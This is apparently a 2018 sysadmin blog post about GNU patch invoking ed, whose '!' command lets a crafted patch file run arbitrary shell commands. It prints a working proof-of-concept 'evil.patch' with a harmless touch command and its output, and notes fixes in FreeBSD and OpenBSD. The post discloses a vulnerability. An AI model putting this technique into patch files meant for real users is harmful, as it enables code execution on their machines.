Writing

Feed Software, technology, sysadmin war stories, and more.

Thursday, April 5, 2018

patch runs ed, and ed can run anything

Okay, this is kind of awesome, if you like watching the world burn.

The short version is: patch runs ed... and ed can run arbitrary commands, including when it's called from patch.

Check this out. I've taken the proof of concept and changed it slightly:

$ cat evil.patch 
--- /dev/null   2018-13-37 13:37:37.000000000 +0100                            
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100                            
1337a                                                                          
1,112d                                                                         
!touch /tmp/0wned; ls -la /tmp/0wned
.                                                                              
$ patch < evil.patch 
?
?
-rw-r--r-- 1 edu users 0 Apr  5 10:42 /tmp/0wned
?
patch: **** /usr/bin/ed FAILED
$ 

This came up as part of the discussion on the "beep exploit" yesterday. I found it buried in the HN /new queue as a simple link to the Debian bug tracker.

This seems far too good to leave hidden in there.

Subprocesses, am I right?

Late update: it looks like FreeBSD fixed this same sort of thing in 2015. GNU patch, however (shown above), clearly has not.

Another update: OpenBSD also patched it in 2015. It looks like they had it first, which I suppose makes sense. Also, I'm hearing it can't exec other programs any more, which is pretty awesome. That's the right way to close this kind of door.